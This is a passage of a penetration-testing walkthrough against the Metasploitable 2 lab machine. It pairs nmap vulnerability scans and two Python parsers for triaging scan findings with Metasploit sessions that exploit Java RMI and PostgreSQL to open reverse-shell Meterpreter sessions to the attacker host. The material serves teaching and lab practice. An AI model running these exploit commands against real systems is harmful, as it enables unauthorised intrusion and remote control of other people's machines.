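1099/tcp open  java-rmi GNU Classpath grmiregistry
| rmi-vuln-classloader: 
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|     References:
|_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
5432/tcp open  postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-poodle: 
|   NOT VULNERABLE:
|   SSL POODLE information leak
|     State: NOT VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|     References:
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
MAC Address: 00:0C:29:71:62:0D (VMware)
"""

PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\S+)\s+(\S+)")
# A script header is "| name: " or "|_name: " with nothing after the colon.
SCRIPT_RE = re.compile(r"^\|[ _]([A-Za-z0-9][\w.-]*):\s*$")
STATE_RE = re.compile(r"State:\s*(NOT VULNERABLE|LIKELY VULNERABLE|VULNERABLE)")
CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b")


def parse_vuln_findings(text):
    """Return one dict per script block: port, script, title, state, cves."""
    findings = []
    port = None
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, current = m.group(1), None
            continue
        if not line.startswith("|"):
            current = None  # left the script output for this port
            continue
        m = SCRIPT_RE.match(line)
        if m:
            current = {"port": port, "script": m.group(1), "title": "", "state": None, "cves": []}
            findings.append(current)
            continue
        if current is None:
            continue
        body = line[2:].strip()  # drop the "| " / "|_" prefix
        m = STATE_RE.search(body)
        if m:
            current["state"] = m.group(1)
        elif body.startswith("IDs:"):
            current["cves"].extend(CVE_RE.findall(body))  # only the IDs line, not reference URLs
        elif not current["title"] and body and not body.endswith(":"):
            current["title"] = body  # first plain line after the VULNERABLE: header
    return findings


def vulnerable_only(findings):
    """Keep the blocks nmap actually marked as (likely) vulnerable."""
    return [f for f in findings if f["state"] in ("VULNERABLE", "LIKELY VULNERABLE")]


if __name__ == "__main__":
    for f in vulnerable_only(parse_vuln_findings(NMAP_OUTPUT)):
        print(f"{f['port']} {f['script']}: {f['title']} {f['cves']}")
```

Feed it the -oN output of a whole subnet scan and the result is a per-port list of confirmed findings with their CVE identifiers, which is the form a ticket or a patch list needs.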

Now, we can use the Metasploit Java RMI module to exploit it.

┌──(kali㉿kali)-[~]
└─$ msfconsole                    
msf6 > search java rmi

Matching Modules
================

   #   Name                                                             Disclosure Date  Rank       Check  Description
   -   ----                                                             ---------------  ----       -----  -----------
   0   exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce  2019-05-22       excellent  Yes    Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
   1   exploit/multi/misc/java_jmx_server                               2013-05-22       excellent  Yes    Java JMX Server Insecure Configuration Java Code Execution
   2   auxiliary/scanner/misc/java_jmx_server                           2013-05-22       normal     No     Java JMX Server Insecure Endpoint Code Execution Scanner
   3   auxiliary/gather/java_rmi_registry                                                normal     No     Java RMI Registry Interfaces Enumeration
   4   exploit/multi/misc/java_rmi_server                               2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
   5   auxiliary/scanner/misc/java_rmi_server                           2011-10-15       normal     No     Java RMI Server Insecure Endpoint Code Execution Scanner
   6   exploit/multi/browser/java_rmi_connection_impl                   2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
   7   exploit/multi/browser/java_signed_applet                         1997-02-19       excellent  No     Java Signed Applet Social Engineering Code Execution
   8   exploit/multi/http/jenkins_metaprogramming                       2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE
   9   exploit/linux/misc/jenkins_java_deserialize                      2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability
   10  exploit/linux/http/kibana_timelion_prototype_pollution_rce       2019-10-30       manual     Yes    Kibana Timelion Prototype Pollution RCE
   11  exploit/multi/browser/firefox_xpi_bootstrapped_addon             2007-06-27       excellent  No     Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
   12  exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315       2023-05-26       excellent  Yes    Openfire authentication bypass with RCE plugin
   13  exploit/multi/http/torchserver_cve_2023_43654                    2023-10-03       excellent  Yes    PyTorch Model Server Registration and Deserialization RCE
   14  exploit/multi/http/totaljs_cms_widget_exec                       2019-08-30       excellent  Yes    Total.js CMS 12 Widget JavaScript Code Injection
   15  exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc           2021-09-21       manual     Yes    VMware vCenter vScalation Priv Esc


Interact with a module by name or index. For example info 15, use 15 or use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc

msf6 > use 4
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(multi/misc/java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.204.137:4444 
[*] 192.168.204.136:1099 - Using URL: http://192.168.204.137:8080/qhpKsPkUu
[*] 192.168.204.136:1099 - Server started.
[*] 192.168.204.136:1099 - Sending RMI Header...
[*] 192.168.204.136:1099 - Sending RMI Call...
[*] 192.168.204.136:1099 - Replied to request for payload JAR
[*] Sending stage (57971 bytes) to 192.168.204.136
[*] Meterpreter session 1 opened (192.168.204.137:4444 -> 192.168.204.136:48969) at 2024-04-28 01:50:00 -0400

meterpreter > Interrupt: use the 'exit' command to quit

Port 5432 Postgresql Exploitation - Metasploitable 2

Let us first scan the target.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 5432 -sC -sV --script=vuln 192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 02:06 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).

PORT     STATE SERVICE    VERSION
5432/tcp open  postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.securityfocus.com/bid/70574
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.cvedetails.com/cve/2014-0224
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt
| vulners: 
|   cpe:/a:postgresql:postgresql:8.3: 
|       SSV:60718       10.0    https://vulners.com/seebug/SSV:60718    *EXPLOIT*
|       PRION:CVE-2013-1903     10.0    https://vulners.com/prion/PRION:CVE-2013-1903
|       PRION:CVE-2013-1902     10.0    https://vulners.com/prion/PRION:CVE-2013-1902
|       CVE-2013-1903   10.0    https://vulners.com/cve/CVE-2013-1903
|       CVE-2013-1902   10.0    https://vulners.com/cve/CVE-2013-1902
|       CVE-2019-10164  9.0     https://vulners.com/cve/CVE-2019-10164
|       SSV:30015       8.5     https://vulners.com/seebug/SSV:30015    *EXPLOIT*
|       SSV:19652       8.5     https://vulners.com/seebug/SSV:19652    *EXPLOIT*
|       PRION:CVE-2010-1447     8.5     https://vulners.com/prion/PRION:CVE-2010-1447
|       PRION:CVE-2010-1169     8.5     https://vulners.com/prion/PRION:CVE-2010-1169
|       POSTGRESQL:CVE-2013-1900        8.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2013-1900
|       POSTGRESQL:CVE-2010-1169        8.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-1169
|       CVE-2010-1447   8.5     https://vulners.com/cve/CVE-2010-1447
|       CVE-2010-1169   8.5     https://vulners.com/cve/CVE-2010-1169
|       SSV:19754       7.5     https://vulners.com/seebug/SSV:19754    *EXPLOIT*
|       CVE-2015-3166   7.5     https://vulners.com/cve/CVE-2015-3166
|       CVE-2015-0244   7.5     https://vulners.com/cve/CVE-2015-0244
|       SSV:30152       6.8     https://vulners.com/seebug/SSV:30152    *EXPLOIT*
|       SECURITYVULNS:VULN:10252        6.8     https://vulners.com/securityvulns/SECURITYVULNS:VULN:10252
|       PRION:CVE-2013-0255     6.8     https://vulners.com/prion/PRION:CVE-2013-0255
|       PRION:CVE-2012-0868     6.8     https://vulners.com/prion/PRION:CVE-2012-0868
|       PRION:CVE-2009-3231     6.8     https://vulners.com/prion/PRION:CVE-2009-3231
|       POSTGRESQL:CVE-2013-0255        6.8     https://vulners.com/postgresql/POSTGRESQL:CVE-2013-0255
|       POSTGRESQL:CVE-2012-0868        6.8     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-0868
|       POSTGRESQL:CVE-2009-3231        6.8     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-3231
|       CVE-2013-0255   6.8     https://vulners.com/cve/CVE-2013-0255
|       CVE-2012-0868   6.8     https://vulners.com/cve/CVE-2012-0868
|       CVE-2009-3231   6.8     https://vulners.com/cve/CVE-2009-3231
|       SSV:62083       6.5     https://vulners.com/seebug/SSV:62083    *EXPLOIT*
|       SSV:62016       6.5     https://vulners.com/seebug/SSV:62016    *EXPLOIT*
|       SSV:61543       6.5     https://vulners.com/seebug/SSV:61543    *EXPLOIT*
|       SSV:19018       6.5     https://vulners.com/seebug/SSV:19018    *EXPLOIT*
|       SSV:15153       6.5     https://vulners.com/seebug/SSV:15153    *EXPLOIT*
|       SSV:15097       6.5     https://vulners.com/seebug/SSV:15097    *EXPLOIT*
|       SSV:15095       6.5     https://vulners.com/seebug/SSV:15095    *EXPLOIT*
|       SECURITYVULNS:VULN:10803        6.5     https://vulners.com/securityvulns/SECURITYVULNS:VULN:10803
|       SECURITYVULNS:VULN:10473        6.5     https://vulners.com/securityvulns/SECURITYVULNS:VULN:10473
|       PRION:CVE-2014-0065     6.5     https://vulners.com/prion/PRION:CVE-2014-0065
|       PRION:CVE-2014-0064     6.5     https://vulners.com/prion/PRION:CVE-2014-0064
|       PRION:CVE-2014-0063     6.5     https://vulners.com/prion/PRION:CVE-2014-0063
|       PRION:CVE-2014-0061     6.5     https://vulners.com/prion/PRION:CVE-2014-0061
|       PRION:CVE-2012-0866     6.5     https://vulners.com/prion/PRION:CVE-2012-0866
|       PRION:CVE-2010-4015     6.5     https://vulners.com/prion/PRION:CVE-2010-4015
|       PRION:CVE-2010-0442     6.5     https://vulners.com/prion/PRION:CVE-2010-0442
|       POSTGRESQL:CVE-2014-0065        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0065
|       POSTGRESQL:CVE-2014-0064        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0064
|       POSTGRESQL:CVE-2014-0063        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0063
|       POSTGRESQL:CVE-2014-0061        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0061
|       POSTGRESQL:CVE-2012-0866        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-0866
|       POSTGRESQL:CVE-2010-4015        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-4015
|       POSTGRESQL:CVE-2009-4136        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-4136
|       POSTGRESQL:CVE-2009-3230        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-3230
|       CVE-2021-32027  6.5     https://vulners.com/cve/CVE-2021-32027
|       CVE-2015-0243   6.5     https://vulners.com/cve/CVE-2015-0243
|       CVE-2015-0242   6.5     https://vulners.com/cve/CVE-2015-0242
|       CVE-2015-0241   6.5     https://vulners.com/cve/CVE-2015-0241
|       CVE-2014-0065   6.5     https://vulners.com/cve/CVE-2014-0065
|       CVE-2014-0064   6.5     https://vulners.com/cve/CVE-2014-0064
|       CVE-2014-0063   6.5     https://vulners.com/cve/CVE-2014-0063
|       CVE-2014-0061   6.5     https://vulners.com/cve/CVE-2014-0061
|       CVE-2012-0866   6.5     https://vulners.com/cve/CVE-2012-0866
|       CVE-2010-4015   6.5     https://vulners.com/cve/CVE-2010-4015
|       CVE-2010-0442   6.5     https://vulners.com/cve/CVE-2010-0442
|       SECURITYVULNS:VULN:11183        6.0     https://vulners.com/securityvulns/SECURITYVULNS:VULN:11183
|       PRION:CVE-2010-3433     6.0     https://vulners.com/prion/PRION:CVE-2010-3433
|       PRION:CVE-2010-1170     6.0     https://vulners.com/prion/PRION:CVE-2010-1170
|       POSTGRESQL:CVE-2010-3433        6.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-3433
|       POSTGRESQL:CVE-2010-1170        6.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-1170
|       CVE-2022-2625   6.0     https://vulners.com/cve/CVE-2022-2625
|       CVE-2018-10915  6.0     https://vulners.com/cve/CVE-2018-10915
|       CVE-2010-3433   6.0     https://vulners.com/cve/CVE-2010-3433
|       CVE-2010-1170   6.0     https://vulners.com/cve/CVE-2010-1170
|       SSV:15154       5.8     https://vulners.com/seebug/SSV:15154    *EXPLOIT*
|       SSV:15096       5.8     https://vulners.com/seebug/SSV:15096    *EXPLOIT*
|       POSTGRESQL:CVE-2009-4034        5.8     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-4034
|       CVE-2023-2454   5.8     https://vulners.com/cve/CVE-2023-2454
|       SSV:19669       5.5     https://vulners.com/seebug/SSV:19669    *EXPLOIT*
|       PRION:CVE-2010-1975     5.5     https://vulners.com/prion/PRION:CVE-2010-1975
|       POSTGRESQL:CVE-2010-1975        5.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-1975
|       CVE-2023-2455   5.5     https://vulners.com/cve/CVE-2023-2455
|       CVE-2010-1975   5.5     https://vulners.com/cve/CVE-2010-1975
|       CVE-2021-23214  5.1     https://vulners.com/cve/CVE-2021-23214
|       PRION:CVE-2011-2483     5.0     https://vulners.com/prion/PRION:CVE-2011-2483
|       CVE-2017-7486   5.0     https://vulners.com/cve/CVE-2017-7486
|       CVE-2015-3167   5.0     https://vulners.com/cve/CVE-2015-3167
|       SSV:61546       4.9     https://vulners.com/seebug/SSV:61546    *EXPLOIT*
|       SSV:60334       4.9     https://vulners.com/seebug/SSV:60334    *EXPLOIT*
|       PRION:CVE-2014-0062     4.9     https://vulners.com/prion/PRION:CVE-2014-0062
|       PRION:CVE-2012-3488     4.9     https://vulners.com/prion/PRION:CVE-2012-3488
|       POSTGRESQL:CVE-2014-0062        4.9     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0062
|       POSTGRESQL:CVE-2012-3488        4.9     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-3488
|       CVE-2014-0062   4.9     https://vulners.com/cve/CVE-2014-0062
|       CVE-2012-3488   4.9     https://vulners.com/cve/CVE-2012-3488
|       SSV:61544       4.6     https://vulners.com/seebug/SSV:61544    *EXPLOIT*
|       PRION:CVE-2014-0067     4.6     https://vulners.com/prion/PRION:CVE-2014-0067
|       CVE-2014-0067   4.6     https://vulners.com/cve/CVE-2014-0067
|       PRION:CVE-2012-2143     4.3     https://vulners.com/prion/PRION:CVE-2012-2143
|       POSTGRESQL:CVE-2012-2143        4.3     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-2143
|       POSTGRESQL:CVE-2012-0867        4.3     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-0867
|       CVE-2012-2143   4.3     https://vulners.com/cve/CVE-2012-2143
|       SSV:61547       4.0     https://vulners.com/seebug/SSV:61547    *EXPLOIT*
|       SSV:61545       4.0     https://vulners.com/seebug/SSV:61545    *EXPLOIT*
|       SSV:60335       4.0     https://vulners.com/seebug/SSV:60335    *EXPLOIT*
|       SSV:60186       4.0     https://vulners.com/seebug/SSV:60186    *EXPLOIT*
|       SSV:4928        4.0     https://vulners.com/seebug/SSV:4928     *EXPLOIT*
|       SECURITYVULNS:VULN:9765 4.0     https://vulners.com/securityvulns/SECURITYVULNS:VULN:9765
|       PRION:CVE-2014-0066     4.0     https://vulners.com/prion/PRION:CVE-2014-0066
|       PRION:CVE-2014-0060     4.0     https://vulners.com/prion/PRION:CVE-2014-0060
|       PRION:CVE-2012-3489     4.0     https://vulners.com/prion/PRION:CVE-2012-3489
|       PRION:CVE-2012-2655     4.0     https://vulners.com/prion/PRION:CVE-2012-2655
|       PRION:CVE-2009-3229     4.0     https://vulners.com/prion/PRION:CVE-2009-3229
|       POSTGRESQL:CVE-2014-0066        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0066
|       POSTGRESQL:CVE-2014-0060        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0060
|       POSTGRESQL:CVE-2012-3489        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-3489
|       POSTGRESQL:CVE-2012-2655        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-2655
|       POSTGRESQL:CVE-2009-3229        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-3229
|       POSTGRESQL:CVE-2009-0922        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-0922
|       CVE-2021-3677   4.0     https://vulners.com/cve/CVE-2021-3677
|       CVE-2021-20229  4.0     https://vulners.com/cve/CVE-2021-20229
|       CVE-2017-7548   4.0     https://vulners.com/cve/CVE-2017-7548
|       CVE-2017-7547   4.0     https://vulners.com/cve/CVE-2017-7547
|       CVE-2014-8161   4.0     https://vulners.com/cve/CVE-2014-8161
|       CVE-2014-0066   4.0     https://vulners.com/cve/CVE-2014-0066
|       CVE-2014-0060   4.0     https://vulners.com/cve/CVE-2014-0060
|       CVE-2012-3489   4.0     https://vulners.com/cve/CVE-2012-3489
|       CVE-2012-2655   4.0     https://vulners.com/cve/CVE-2012-2655
|       CVE-2009-3229   4.0     https://vulners.com/cve/CVE-2009-3229
|       SSV:19322       3.5     https://vulners.com/seebug/SSV:19322    *EXPLOIT*
|       PRION:CVE-2010-0733     3.5     https://vulners.com/prion/PRION:CVE-2010-0733
|       PACKETSTORM:127092      3.5     https://vulners.com/packetstorm/PACKETSTORM:127092      *EXPLOIT*
|       CVE-2021-3393   3.5     https://vulners.com/cve/CVE-2021-3393
|       CVE-2010-0733   3.5     https://vulners.com/cve/CVE-2010-0733
|_      CVE-2022-41862  2.6     https://vulners.com/cve/CVE-2022-41862
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.78 seconds
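
The vulners output above is long and lists the same CVE several times under different prefixes (PRION:, POSTGRESQL:, bare CVE-), which makes it hard to see what actually needs patching. As an added example (not part of the original walkthrough), the following Python parser reads that block, collapses duplicate rows onto one CVE id, and ranks the remaining entries by CVSS score and by whether vulners tagged public exploit code. The sample text is a constructed excerpt of the scan above, and the 7.0 cut-off is an assumed triage threshold.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed excerpt of the nmap vulners output above (the real block lists
# far more rows); used here as sample input for the parser.
SAMPLE = """\
| vulners:
|   cpe:/a:postgresql:postgresql:8.3:
|       SSV:60718       10.0    https://vulners.com/seebug/SSV:60718    *EXPLOIT*
|       PRION:CVE-2013-1903     10.0    https://vulners.com/prion/PRION:CVE-2013-1903
|       CVE-2013-1903   10.0    https://vulners.com/cve/CVE-2013-1903
|       CVE-2019-10164  9.0     https://vulners.com/cve/CVE-2019-10164
|       POSTGRESQL:CVE-2013-1900        8.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2013-1900
|       SSV:30152       6.8     https://vulners.com/seebug/SSV:30152    *EXPLOIT*
|       CVE-2012-0868   6.8     https://vulners.com/cve/CVE-2012-0868
|_      CVE-2022-41862  2.6     https://vulners.com/cve/CVE-2022-41862
"""


@dataclass
class Finding:
    ident: str            # vulners id as printed (CVE-..., PRION:CVE-..., SSV:...)
    score: float          # CVSS score column
    url: str
    exploit: bool         # row carried the *EXPLOIT* tag
    cve: Optional[str]    # CVE id embedded in ident, if any


CPE_RE = re.compile(r"^\|_?\s+(cpe:/\S+?):?\s*$")
ROW_RE = re.compile(r"^\|_?\s+(\S+)\s+(\d+(?:\.\d+)?)\s+(https?://\S+)(?:\s+\*EXPLOIT\*)?\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_vulners(text: str) -> Dict[str, List[Finding]]:
    """Group vulners rows under the CPE heading they appear beneath."""
    findings: Dict[str, List[Finding]] = {}
    current = None
    for line in text.splitlines():
        m = CPE_RE.match(line)
        if m:
            current = m.group(1)
            findings[current] = []
            continue
        m = ROW_RE.match(line)
        if m and current is not None:
            ident, score, url = m.group(1), float(m.group(2)), m.group(3)
            cve = CVE_RE.search(ident)
            findings[current].append(
                Finding(ident, score, url, "*EXPLOIT*" in line, cve.group(0) if cve else None)
            )
    return findings


def triage(findings: Dict[str, List[Finding]], min_score: float = 7.0) -> List[Finding]:
    """Collapse duplicate rows for one CVE and keep those scoring at or above min_score."""
    best: Dict[str, Finding] = {}
    for rows in findings.values():
        for f in rows:
            key = f.cve or f.ident
            cur = best.get(key)
            # Prefer the higher score; on a tie prefer the bare CVE row over a vendor alias.
            if cur is None or f.score > cur.score or (f.score == cur.score and f.ident == key):
                best[key] = f
    keep = [f for f in best.values() if f.score >= min_score]
    keep.sort(key=lambda f: (-f.score, f.cve or f.ident))
    return keep


def exploit_available(findings: Dict[str, List[Finding]]) -> List[str]:
    """Ids vulners marked *EXPLOIT*: public exploit code exists, so these go first."""
    return sorted({f.ident for rows in findings.values() for f in rows if f.exploit})


if __name__ == "__main__":
    parsed = parse_vulners(SAMPLE)
    for f in triage(parsed):
        print(f"{f.score:4}  {f.cve or f.ident:<16} {'exploit' if f.exploit else ''}")
    print("public exploits:", exploit_available(parsed))
```

Feeding the whole scan through `parse_vulners` turns several hundred rows into a few dozen unique CVEs; the `*EXPLOIT*` rows are the ones a defender would schedule first, since the scan shows both that the version is old (PostgreSQL 8.3) and that working exploit code is public.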

Let us exploit it with Metasploit's postgres_payload module.

msf6 exploit(multi/misc/java_rmi_server) > search postgres

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   1   post/linux/gather/enum_users_history                                         normal     No     Linux Gather User History
   2   exploit/multi/http/manage_engine_dc_pmp_sqli                2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   3   exploit/windows/misc/manageengine_eventlog_analyzer_rce     2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Execution
   4   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   5   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   6   exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   7   exploit/multi/postgres/postgres_createlang                  2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   8   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   9   auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   10  auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
   11  auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   12  auxiliary/scanner/postgres/postgres_version                                  normal     No     PostgreSQL Version Probe
   13  exploit/linux/postgres/postgres_payload                     2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   14  exploit/windows/postgres/postgres_payload                   2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   15  auxiliary/scanner/postgres/postgres_hashdump                                 normal     No     Postgres Password Hashdump
   16  auxiliary/scanner/postgres/postgres_schemadump                               normal     No     Postgres Schema Dump
   17  auxiliary/admin/http/rails_devise_pass_reset                2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   18  exploit/multi/http/rudder_server_sqli_rce                   2023-06-16       excellent  Yes    Rudder Server SQLI Remote Code Execution
   19  post/linux/gather/vcenter_secrets_dump                      2022-04-15       normal     No     VMware vCenter Secrets Dump


Interact with a module by name or index. For example info 19, use 19 or use post/linux/gather/vcenter_secrets_dump

msf6 exploit(multi/misc/java_rmi_server) > use exploit/linux/postgres/postgres_payload 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(linux/postgres/postgres_payload) > run

[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(linux/postgres/postgres_payload) > set LHOST 192.168.204.137
LHOST => 192.168.204.137
msf6 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.204.137:4444 
[*] 192.168.204.136:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/VaEYRLQK.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.204.136
[*] Meterpreter session 2 opened (192.168.204.137:4444 -> 192.168.204.136:36615) at 2024-04-28 02:10:54 -0400

meterpreter > 

Apache Tomcat/Coyote JSP engine 1.1 Exploitation

Run an nmap scan with the vuln script category against the Tomcat port:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.204.136 -p 8180 --script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 00:22 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00036s latency).

PORT     STATE SERVICE VERSION
8180/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags: 
|   /admin/: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/index.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/account.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin_login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/home.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin-login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/adminLogin.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/controlpanel.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/cp.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/index.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/home.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/controlpanel.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin-login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/cp.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/account.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin_login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/adminLogin.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/jscript/upload.html: 
|     JSESSIONID: 
|_      httponly flag not set
| vulners: 
|   cpe:/a:apache:coyote_http_connector:1.1: 
|       OSV:BIT-APACHE-2021-31618       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
|       OSV:CVE-2023-26044      5.3     https://vulners.com/osv/OSV:CVE-2023-26044
|       OSV:CVE-2022-36032      5.3     https://vulners.com/osv/OSV:CVE-2022-36032
|       PRION:CVE-2023-26044    5.0     https://vulners.com/prion/PRION:CVE-2023-26044
|_      PRION:CVE-2022-36032    5.0     https://vulners.com/prion/PRION:CVE-2022-36032
